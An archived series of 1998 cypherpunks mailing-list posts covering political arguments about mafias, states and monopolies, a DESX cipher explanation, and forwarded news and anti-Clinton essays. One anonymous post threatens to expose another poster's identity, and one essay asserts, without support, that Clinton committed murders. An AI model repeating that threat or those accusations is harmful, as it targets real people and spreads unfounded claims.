~> identity scumbag. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 11 Oct 1998 07:05:59 +0800
To: Matthew James Gering <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A193A7A33@mossbay.chaffeyhomes.com>
Message-ID: <199810102245.PAA21230@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 02:36 AM 10/9/98 -0700, Matthew James Gering wrote:
> Not really, the state holds a monopoly on "legal" force,
> whereas the Mafia and other black-market organizations do
> not. What is interesting is they use force often because
> they cannot use the government legal system to arbitrate
> their disputes.

It has been a very long time since we had an armed  conflict
between one major mafia type organization and another in the
US.

It appears to me that they have a problem because they cannot
resolve their disputes in public, thus it is hard to tell the
difference between an oppressive mafia organization that
mistreats its clients, and a legitimate mafia organization
that protects its clients.  However the government dispute
resolution apparatus does not possess any special wisdom that
the mafia dispute resolution apparatus lacks.

By and large, mafias seem to be less evil than governments,
and perform fewer violent, oppressive, and flagrantly unjust
acts than governments, and are less prone to expensive and
destructive wars.   This probably reflects the fact that such
actions by mafia chiefs are far more likely to get the mafia
chief killed, than similar acts by governments are likely to
get the ruler killed.

One might perhaps argue that some notable mafias in the US
are worse than the US government, though I have never heard
of them asking for fifty percent of someone's income.
However clearly no mafia in the US, or indeed anywhere, has
ever been as bad as any of the more objectionable
governments. 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     FwiAHWNbE9PK8jomcmlEZQlBYbPYs5IhxFnAPjN2
     4QU3gWdu2/5C3xghqUfLx5inM+SHUn29tmXbz/wWO
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 11 Oct 1998 07:03:35 +0800
To: Steve Mynott <cypherpunks@cyberpass.net>
Subject: Re: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A193A7A31@mossbay.chaffeyhomes.com>
Message-ID: <199810102245.PAA21253@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
On Thu, Oct 08, 1998 at 04:14:32PM -0700, Matthew James
Gering wrote:
> >  The Mafia has had two primary characteristics:  a) the
> > use of force

At 10:24 AM 10/9/98 +0100, Steve Mynott wrote:
> wouldn't this characteristic define the mafia as a "state"
> to some degree?

A state is merely a mafia that has succeeded in crushing its
competitors by force.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     PhKk4RhYVNaeZPogdcsq1rhljgRx/8xPW3ERa+RZ
     4HqTzfVhadbFtw7OnMn+adlAQibN0JlmTgUmw22Wt
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>"James A. Donald" <jamesd@echeque.com>
Date: Sun, 11 Oct 1998 07:03:23 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810081606.LAA17694@einstein.ssz.com>
Message-ID: <199810102245.PAA21305@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



> > You cannot have monopoly (in the sense of the power to
> > extract monopoly profits) except by state intervention as
> > has been proven by experience time and time again.

At 11:06 AM 10/8/98 -0500, Jim Choate wrote:
> Examine history with an unbiased eye.

I have provided specific examples from history.  You have
told us that various undefined markets in unspecified places
at unspecified times were monopolized by unspecified big
companies.

If these monopolies were rampaging all over the place, your
really should be able to name them, and show that specific
named monopoly companes were able to extract specific
identified monopoly profits.

> Incorrect. I have listed several examples (eg
> meat-processing in the 1920's) where the resultant
> involvement of the government came *AFTER* (not before as
> you claim) there was evidence of wide spread abuse of the
> consumer and the employee of those producters.

In what country?  Ruritania?

What was the name of the evil monopoly that dominated the
meat processing industry?

What were their excess profits?

And if they were making excess profits, what stopped any man
and his dog from setting up in business cutting up cattle?

(Unless, of course, it was the government that stopped any
man from slaughtering cattle.)

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     qszZcMydwBnWQ3Fd1G+pG0KLz7KIkE6RINedm82c
     4PzuGOaB00Ogh6kc9Q6PK3bb9CQAITF9Jqzdoy+G7
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Briggs <ian@deepwell.com>
Date: Sun, 11 Oct 1998 09:45:40 +0800
To: "Joseph 'Anonymous' Howe" <nobody@privacy.nb.ca>
Subject: Re: Here we go again...
In-Reply-To: <199810101455.LAA03704@privacy.nb.ca>
Message-ID: <4.1.19981010181458.016c9080@deepwell.com>
MIME-Version: 1.0
Content-Type: text/plain



Bullshit
5 yard penalty.



>> form of tattoo called "Blue Star" is being sold to school children.


Search for "Urban Myth Blue Star"
or

http://www.lycaeum.org/drugs/synthetics/lsd/FAQ-LSD-Tattoo.html


>>Some are laced with strychnine

http://www.lycaeum.org/drugs/synthetics/lsd/strychnine_fla.html
http://www.lycaeum.org/drugs/synthetics/lsd/strychnine.html



Luv
ian




Welcome to 1984
as with all goverment projects, its a bit late 
and slightly overbudget
	-IB.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Sun, 11 Oct 1998 03:51:16 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19981010192430.25602.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



> >HOW MUCH CODE DID 'CYPHERPUNK' TIM MAY EVER WRITE?
>
> How much code have you ever written?

A DECENT AMOUNT. THE CRYPTO APPS I CREATED ARE SOMEWHAT UNIQUE,
SO IF I MENTIONED THEM YOU MIGHT FIGURE OUT WHO I AM.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@die.com>
Date: Sun, 11 Oct 1998 10:10:00 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: DESX
In-Reply-To: <199810102206.AAA06060@replay.com>
Message-ID: <19981010215151.A628@die.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, Oct 11, 1998 at 12:06:14AM +0200, Anonymous wrote:
> | So what's DESX?
> 
> DESX is a modification of DES which uses a 64+56+64 bit key, with
> what is called "pre- and post-whitening".  Specifically, break the key
> into three pieces, 64 bit K1, 56 bit K2, 64 bit K3.  Then DESX is
> defined by:
> 
> 	C = K1 xor DES (K2, K3 xor P)
> 
> where P is plaintext, C is ciphertext, and DES (K, P) is the DES
> encryption of P under key K.
> 
> The encryption then has three steps:
> 
> 	- XOR the input with K3
> 	- DES encrypt that with K2
> 	- XOR the result with K1
> 
> The first and last steps are called "whitening" because by xoring with
> a random value, any structure is destroyed.  White light is a uniform
> and unstructured mixture of all colors.
> 

	Anybody have any estimate as to how much actual strength this
adds to DES ?  How would one break it in a practical cracker machine ?





-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <remailer@hr13.zedz.net>
Date: Sun, 11 Oct 1998 04:34:34 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <cb4338e515c87edd@hr13.zedz.net>
MIME-Version: 1.0
Content-Type: text/plain



PS. there is someone on this list who knows who
i am. yes there is someone who knows who anon
posters are. we fucking hate you and am waiting 
for you to take the trap and we will reveal your
identity scumbag.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 11 Oct 1998 13:55:52 +0800
To: cypherpunks@cyberpass.net
Subject: IP: A Poll / A Thousand Lies (satire)
Message-ID: <199810110537.WAA18773@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "Tom Simmons" <simmons@camasnet.com>
Subject: IP: A Poll / A Thousand Lies (satire)
Date: Fri, 9 Oct 1998 11:48:22 -0700
To: "Ignition Point" <ignition-point@pobox.com>

Editor,
I took my own cross-sectional, wholly "scientific" poll on
Clinton's impeachment/resignation. In order to be truly
"scientific", I followed these rules:
1) Choose a densely populated area of a major city in order to
get a poll result that is not one-sided.
2) There are 25 known minority cultures in the U.S., including,
in "random" order, but not limited to Indian, African, Mexican,
Oriental, Caucasian, gray wolf, spotted owl, and grizzly bear. In
order to ensure that minorities are not treated as minorities,
enforce strict parameters of 96 percent combined minority and 4
percent Caucasian.
3) Eliminate the following from the poll to preclude prejudice:
a.) anyone who did not vote for Clinton. It would not be fair to
include those who are obviously biased already.
b.) anyone who thinks a Newt Gingrich is a slimy lizard.
c.) anyone who doesn't think  Newt Gingrich is a slimy lizard.
d.) all who believe there is such a thing as "sin".
e.) all who have ever used or heard the phrase " moral authority
".
f.) anyone who believes that a document as old as the
Constitution should matter, at this point.
g.) anyone who believes someone with the nickname Slick Willy,
caught in a thousand lies,  might not be telling the truth now.
h.) anyone who has ever questioned the actions of the government
and is still living or is not imprisoned.
Using these guidelines as promoted by the United Pollsters /
Young Urban Research Specialists, commonly known as UPYURS, the
results were astoundingly accurate. When asked if Clinton is
doing a good job, 7335 percent answered "yes", although when
asked to be more specific, 8223 percent hadn't the foggiest idea
what his job duties are.
As to whether he should resign, 14243 percent answered " no ". A
breakdown analysis revealed that, among those not eliminated by
the above fairness rules, 62,786,091 work for the Clinton
administration, 24,892,456 cannot speak English, 12,873,612 bear
fur, and there was one token conservative.
In a completely unrelated question, the same broadband group was
asked whether Hitler should be posthumously awarded the Nobel
Peace Prize......

Tom Simmons

*****************************************************************
*****
The most formidable weapon against oppression and tyranny is not
bullets, for their use is as a last resort, nor hiding in the
mountains, for there is no safe haven from tyranny, nor foolish
martyrdom for freedom's sake. It is an informed and involved
citizenry. This IS our only hope.Get involved.
Tom Simmons




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 11 Oct 1998 14:22:53 +0800
To: cypherpunks@cyberpass.net
Subject: IP: This Country *Needs* to Come to a Screeching Halt!
Message-ID: <199810110537.WAA18784@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Patricia Neill <pnpj@db1.cc.rochester.edu>
Subject: IP: This Country *Needs* to Come to a Screeching Halt!
Date: Fri, 09 Oct 1998 15:44:42 -0400
To: ignition-point@majordomo.pobox.com

This Country *Needs* to Come to a Screeching Halt!
by Patricia Neill (c) 1998

All week I've had to listen to the ever more irritating mass media clones
droning on about how Americans want "the country to move on" and how all
these polled citizens want the President and Congress "to get back to the
business of running the country." The media droids (and they have such a
droidic quality that they're beginning to sound all alike to me) have of
course used their boring technique of repeating these dimwitted phrases over
and over and over and over in the bright hope that we get the message.

As always, I have to wonder who the hell these media people poll. It surely
isn't me nor the millions upon millions like me! My bet is that the
pollagandizers (a newly minted, wonderful fresh coinage from the pen of
Publius Press) ask each other what they think, and use that as their
statistically significantly absolutely similar population. Or maybe they ask
the animals at the Washington Zoo and take the calls, snarls and roars for
the dulcent tones of assent and consent to their pollaganda (lifted from the
same place, today's Federalist Digest). But what I do know is that they are
not asking *anyone* who remotely disagrees with their bias, and if they
mistakenly call someone like me, I'm probably one of the ones they would
simply ignore, as not statistically significant, or at least not
significant, to their wizened little minds.

As for me, do I want "the country to move on?" Hell, NO! I want it to come
to a screeching halt! I want everything else to stop, cease, desist until
the American people and those spurious Spongelords down in Congress have a
chance to fully investigate Mr. Clinton and his White House. I don't care if
no other "business of the country" gets handled. I don't care if NO federal
agencies get funded. In fact, I'd just as soon they weren't. Let's not fund
them for a year, and see if we miss any of them. I doubt it. We'd all be a
lot happier if they disappeared off the face of the earth. Ain't that the
truth.

I don't even care if Congress has to close down. That'd be another blessing
in my book. They can all meet outside of Congress and hold their
investigation. They don't need to be under oath--they never pay any
attention to it anyway. In fact, why doesn't the Republican majority shut
down Congress while they go about checking out those lying sacks of gas up
on 1600 Pennsylvania. They can rent the Watergate Hotel--it'd be a fitting
touch.

I want to know every little detail of what Mr. Clinton did, and when. I want
to know how Hillary's billing files for the Rose Law Firm "disappeared" and
then "showed up." I want to know about all the millions Bill and Hillary and
gang stole from Madison Guaranty. I want all the myriads of scandals of this
White House--both Clintons and ALL their cohorts--laid open for the public
to see--and I know it will be ugly, real ugly. Actually, my bet is it will
be pretty fascinating in a sick kind of way. Like watching a huge spider
crawl up the wall if you have arachnaphobia.

One fatheaded demagogue (I think it was Barney Frank) was quoted on NPR this
morning as saying (and this is not exact, as I was busy trying to get the
escaping smoke back into my ears). In the whining, puling tones,
characteristic of this particular specimen of Congress:  "We should censure
Clinton, but he did nothing impeachable. Do you *really* want this thing to
drag on for a year, while the 'business of the country' is waiting?"

Short answer to that is, there is absolutely no reason under the sun for
this to take a year, you dissembling, mammering twit! You could do it in a
day, an hour, a nanosecond.You ALREADY know the crimes of Bill Clinton and
his wife. You already *know* he lied, he lied to you, he lied to the grand
jury, he lied to the American people. And my question for you is, what the
hell is your *problem.* Do you honestly think Bill Clinton should be allowed
to get away with not only his adultery and lying, but with all his other
malfeasances, offenses, violations, felonies, torts, misconduct, misdeeds,
sins, transgressions, iniquities and outrages--did I miss anything? Oh yes,
murders! You have six years worth to sort through. In fact, Bill Clinton is
such a crook that he should have been impeached, tried, convicted and jailed
*before* he became president. You have his Washington crimes, but if you go
back to his Arkansas years, you'd really have a bonanza!

So, please, stop everything else and deal with this impeachment,
immediately. The financial global crisis can go right on crisis-ing, for all
I care. You all created that problem in the first place, and you ain't gonna
get my money to solve it by bailing out Wall Street again. The heck with
that. So put everything else to the side, and yes, bring this country to a
screeching halt. And see to Mr. Clinton's crimes. My respect for the
government is already a mere wisp at this point, if that. If Congress does
not impeach--and do a serious job--then ALL my respect for government and
what you folk cynically call "rule of law" will be gone. 

That's a promise.






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 11 Oct 1998 14:03:29 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Different Approaches to Privacy Issue: OECD
Message-ID: <199810110537.WAA18794@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Different Approaches to Privacy Issue: OECD
Date: Fri, 09 Oct 1998 16:28:03 -0500
To: believer@telepath.com

Source:  USIA
http://www.usia.gov/current/news/latest/98100904.clt.html?/products/washfile
/newsitem.shtml

09 October 1998 

OECD CONFERENCE ACCEPTS DIFFERENT APPROACHES TO
PRIVACY ISSUE 

(Resolved authentication issue on electronic signatures) (400)
By Bruce Odessey
USIA Staff Correspondent

Ottawa -- A conference of 29 industrialized countries for promoting
electronic commerce has resolved a controversy between the United
States and the European over Internet privacy by accepting both points
of view.

The United States contended industry should be left to manage the
problem by itself, but the European Union had demanded a government
regulatory approach.

"The adversity of views can produce compatible solutions," said John
Manley, Canadian minister of industry, who presided over the October
7-9 conference of the Organization for Economic Cooperation and
Development.

The language approved by the OECD said the governments "encourage the
adoption of privacy policies, whether implemented by legal,
self-regulatory, administrative or technological means."

In a statement issued in Washington U.S. Commerce Secretary William
Daley praised the conference work.

"Our self-regulatory approach can co-exist with approaches taken by
other governments so long as we focus on our common objective --
effective privacy protection," Daley said.

Again, on the issue of authenticating e-commerce signatures and
enforcing Internet contracts, the OECD was comfortable with different
approaches. The governments declared they would "take a
non-discriminatory approach to electronic authentication from other
countries."

The three-day conference held in Ottawa, Canada, was the first one
held by the OECD to include representatives from business, labor and
consumer groups as well as non-member governments.

Business representatives expressed satisfaction with the outcome, but
representatives of consumer groups were skeptical or hostile.

The OECD staff is required to complete draft guidelines in 1999 on
consumer protection.

The OECD emphasized development "of effective market driven
self-regulatory mechanisms that include input from consumer
representatives." But consumer advocates insisted that only
government-to-government agreements can protect consumer interests
when shoddy goods are ordered over the Internet and delivered across
national borders.

The conference also took some crucial decisions on taxation. Notably
the governments agreed to apply existing taxes to electronic commerce
and not to develop new taxes.

They also agreed to impose taxes at the place of consumption and not
at the place of production and to work out problems in defining the
place of consumption.

OECD Director-General Donald Johnston said he expected some sort of
follow up meeting at the working level and not at the ministerial
level within a year.

-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 11 Oct 1998 14:21:52 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Oops! Police Fire Tear Gas Into Wrong House
Message-ID: <199810110537.WAA18805@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Oops! Police Fire Tear Gas Into Wrong House
Date: Fri, 09 Oct 1998 17:21:40 -0500
To: believer@telepath.com

Source:  St. Paul, Minnesota Pioneer Planet News
http://www.pioneerplanet.com/news/mtc_docs/004072.htm

Published: Friday, October 9, 1998 

Suspect captured; incident probed
Tear gas fired into neighbor's house by St. Paul police

ROBERT F. MOORE STAFF WRITER 

A 12-hour search for a man who shot at St. Paul police in Highland
Park ended Thursday morning when a police dog found him hiding in a
tool shed.

And a couple living next door to the suspect was temporarily moved by
the city into a hotel after police fired tear gas into their home.

Police Chief William Finney said Thursday night he didn't know
whether the action was planned by the Critical Incident Response
Team, or CIRT.

``I suspect it was an accident,'' Finney said. ``Overall it was an
excellent operation. No one was hurt. They held the position for 12
hours and they made the arrest. But they have some explaining to do.''

Dr. Daniel Lutz, the owner of the house, was not looking for
explanations Thursday night. He just wanted to get back into the home
he has shared with his wife for the last five years.

``I saw my house in the dark last night, but I don't even know the extent
of the damage,'' said Lutz, 28, a chiropractor in Circle Pines. ``Right
now, I'm not trying to point fingers. I don't know if it was justified or
not. I just want my house put back in order.''

Lutz said the city has begun decontaminating the house and that he
planned to move back in early next week.

He and his wife had been evacuated and were at a neighbor's home
before the tear gas operation began just after 1 a.m.

Meanwhile, Finney has scheduled a meeting with supervisors of the
operation today to determine what happened.

Other neighbors who took cover in their basements before the
operation said a contractor was at the scene late Thursday afternoon to
replace the windows of the Lutz home.

Finney said the city attorney was working with the family to repair the
damage. Neither Finney nor Lutz knew the extent of the damage
Thursday night.

Despite the incident, however, neighbors agreed police responded
appropriately, simply because the suspect was apprehended.

At about 8:30 a.m. Thursday, a police dog discovered Wa Lee Her,
51, in a rusty tin shed next to a residence on the 2300 block of
Edgcumbe Road. Her was treated at Regions Hospital for dog bites on
a leg and released to police custody, pending a decision on multiple
aggravated assault charges.

Police said the dog, Ranger, was sent into the shed after Her ignored
orders to come out. The suspect did not draw a weapon during his
capture, though police recovered a shotgun and a rifle. One of those
weapons was allegedly used the night before to threaten his wife and
also to fire a shot at police. Her's stepson told a 911 dispatcher his
stepfather was threatening to shoot his mother.

Her was apprehended just blocks away from his family's St. Paul
Avenue house.

Finney praised the two officers, Tina Kill and Jeffrey Levens, who
responded to Her's home on the 1100 block of St. Paul Avenue just
before 9 p.m. Wednesday.

``I'm real proud of those two officers,'' Finney said. ``They did exactly
what they were trained to do. They contained the situation, evacuated
the residents of the house, called for additional resources and kept the
suspect bottled up all night.''

Police blocked off the area soon after Her allegedly fired a shot at
Levens and fled into the neighborhood between Howell Street and
Edgcumbe Road.

Levens had shined a flashlight on the suspect and ordered him to put his
hands in the open, when Her fired at the officer, police said. Levens
returned fire. No one was hit.

Later in the night, officers decided to use tear gas after hearing what
police said was a muffled sound, possibly a gunshot, come from the
suspect's house. Police first fired tear gas into the Lutz home and then
the suspect's.

Officers from CIRT and the K-9 unit waited until about 7 a.m. to
conduct a ground search of the area. It was a move Finney said was
intended to protect both the public and the between 40 and 50 officers
in the area.

``It doesn't make sense to search a wooded area in the dark when the
suspect has such firepower,'' Finney said. ``We don't want citizens
caught in the cross-fire.''

Neighbors knew little about the suspect, but longtime residents thought
the family moved into their home less than two years ago.

``It was the most frightened I have ever been in my life,'' said Bonnie
Rodriguez, 49, who lives next door to the house where Her was found.
``I was getting ready to go to my doctor and I heard police officers
crawling on my roof and walking on my patio. Some had bulletproof
vests, some were dressed in camouflage. They had their guns drawn, so
they must have known the man was close. I thought there would be a
shootout in front of my house and someone would die in my yard.''

_

Rodriguez, who has lived on Edgcumbe Road for 15 years, said police
were searching around her house for about 30 minutes Thursday
morning.

``I feel better that he is not out here right now, but it terrifies me that he
was out there all night and could have broken into my house,'' she said.

Pat Sellner, who also lives in the neighborhood, viewed the assault and
manhunt as isolated incidents. Sellner, however, admitted being nervous
when he heard a helicopter flying overhead Wednesday night.

``I called 911 when the helicopter got lower,'' he said. ``The dispatcher
just told me to lock the doors and to stay inside.''

_Cmdr. Doug Wills viewed the entire situation with relief, reflecting on
the deaths of two St. Paul police officers gunned down four years ago.

``Whenever you get in a situation like this, you have to remember the
day those officers were killed,'' Wills said. ``It dictates how you do
business, because you want to make sure nothing like that will happen
again.''

St. Paul police officer Ron Ryan Jr. was fatally shot at 7 a.m. Aug. 26,
1994, in the parking lot of an East Side church. Three hours later,
officer Tim Jones and his police dog, Laser, were shot and killed by
Ryan's assailant as they and others searched for him in the
neighborhood. Guy Harvey Baker was caught, convicted and
sentenced to life in prison for the slayings.


Robert F. Moore, who covers crime and public safety, can be reached at
rmoore@pioneerpress.com or at (651) 228-5591.

(c)1998 PioneerPlanet / St. Paul (Minnesota) Pioneer Press - All Rights
Reserved 
copyright information
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 11 Oct 1998 14:08:32 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Congress Poised To Approve Digital Copyright Law
Message-ID: <199810110537.WAA18819@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Congress Poised To Approve Digital Copyright Law
Date: Fri, 09 Oct 1998 18:41:50 -0500
To: believer@telepath.com

Source:  Fox News - Reuters

Congress Poised To Approve Digital Copyright Law
            3.08 p.m. ET (1909 GMT) October 9, 1998

 WASHINGTON - Congress was expected to complete work later Friday on
legislation to update copyright law for the digital age, after removing a
controversial provision granting new rights to databases. 

 The bill, which the Senate approved Thursday and the House will consider
Friday, implements provisions of two international treaties adopted by the
World Intellectual Property Organization in 1996. 

 Software makers, movie studios, book publishers and other creators of
copyrighted works have pushed hard for the legislation. They feared that as
their products increasingly became available on the Internet in digital
form, pirates and criminals would be able easily to make and sell illegal
copies. 

 The legislation creates criminal penalties for anyone who disables
high-tech, anti-piracy protections, such as encryption, used to block
illegal copying. The bill forbids the manufacture, import, sale or
distribution of devices or services used for circumvention, as well. 

 "This was a huge win for us,'' said Richard Taylor, spokesman for the
Motion Picture Association of America. The movie industry will depend
heavily on anti-piracy technology for movies distributed in all manner of
formats, he said. 

 A variety of exceptions were also included at the request of libraries,
scientists and universities as well as some manufacturers of consumer
electronic devices. They feared the law would prevent some kinds of
research and would unfairly limit "fair use,'' the central principle of
existing copyright law allowing copies to be made for educational and other
noncommercial purposes. 

 The exceptions include allowing circumvention if done for computer
security testing, encryption research or limited kinds of computer software
development. Internet surfers could also circumvent in limited ways to
protect their privacy and parents could circumvent to monitor their
children's travels through cyberspace. 

 "What we've really been fighting about for the last few months was the
exceptions,'' said Jonathan Band, a lawyer at Morrison & Foerster who
worked with groups seeking to protect fair use. 

 Band criticized Congress for criminalizing devices instead of actions only
and for ignoring a person's motives for circumventing. "Given that Congress
chose to go about it entirely the wrong way, it ended up pretty well,'' he
said. 

 In addition, at the urging of Band's group and others, the
anti-circumvention laws will not go into effect for two years, until the
Librarian of Congress, with advice from the Commerce Department, decides
whether additional exceptions need to be made. Such exceptions would be
reconsidered in a recurring process every three years, at which time new
exceptions could also be created. 

 The bill also defined broad freedom from liability for online and Internet
service providers, like America Online , which otherwise might have been
held financially liable for copyright infringement by one of their millions
of customers. 

 Under the bill, service providers will not be held liable for violations
they do not know of but if notified by a copyright holder, must take rapid
action to shut down the alleged violator. However, if the copyright holder
fails to pursue the claim in court within a few weeks, the alleged violator
has the right to demand that online access be restored. 

 The controversial database provision, that was added at the last minute to
the House version of the bill by North Carolina Republican Rep. Howard
Coble, was dropped by a conference committee of members of both chambers. 

 The provision would have overturned a Supreme Court ruling and granted
copyright protection for the first time to databases assembled out of facts
that themselves were common knowledge and not protected by copyright law. 

 "The library community is extremely grateful that a sea change in American
law was not made,'' Adam Eisgrau, lobbyist for the American Library
Association, said. 

                     (c) Reuters Ltd. All rights reserved
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 11 Oct 1998 05:11:47 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
Message-ID: <199810102056.WAA31995@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>> > >HOW MUCH CODE DID 'CYPHERPUNK' TIM MAY EVER WRITE?
>
>I suppose the cyphernomicon doesn't count as furthering 
>the cause to you?

ahhh, so when you say "cypherpunks write code" that also
means articles and other writings too????

so you can be a cypherpunk by writing a lot of stuff ABOUT
cypherpunks code????

but just cause you write the code or text, that's only
one part of the equiation, right???

in other words is david chaum a cypherpunk????




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BMM <bmm@minder.net>
Date: Sun, 11 Oct 1998 11:25:40 +0800
To: cypherpunks@minder.net
Subject: IP address change
Message-ID: <Pine.LNX.3.96.981010230634.6218A-100000@waste.minder.net>
MIME-Version: 1.0
Content-Type: text/plain



Within the next 24 hours, minder.net will be moving to a new block of
IP's.  Until DNS catches up with the new addresses, mail to 
cypherpunks@minder.net may become delayed or undeliverable for a short
time.

Thanks

-Brian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 11 Oct 1998 15:11:21 +0800
To: cypherpunks@cyberpass.net
Subject: Re: A Scud in California!
In-Reply-To: <Pine.BSI.3.95.981008202424.17213B-100000@kizmiaz.dis.org>
Message-ID: <v03130304b246042ccc31@[209.66.100.146]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:30 PM -0700 10/10/98, Anonymous wrote:
>>>>>> William Knowles <erehwon@kizmiaz.dis.org> writes:
>
>  >> From another one of the several lists I'm on, I figured someone
>  > might know who the new pseudo-proud owner of a fully-operational
>  > SS-1C Scud missle *WITH* moblie launcher is...
>
>No shit, Batman -- especially seeing as TCM already discussed it on
>this list over a week ago...
>
>-- ScudMonger

Hey, don't give free clues to the clueless.

Besides, my interest is not in that obsolete SCUD, but in the 8
shoulder-fired missiles brought in at Cosco's port the week before.

--Tim May


Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 11 Oct 1998 06:22:01 +0800
To: cypherpunks@cyberpass.net
Subject: DESX
Message-ID: <199810102206.AAA06060@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



| So what's DESX?

DESX is a modification of DES which uses a 64+56+64 bit key, with
what is called "pre- and post-whitening".  Specifically, break the key
into three pieces, 64 bit K1, 56 bit K2, 64 bit K3.  Then DESX is
defined by:

	C = K1 xor DES (K2, K3 xor P)

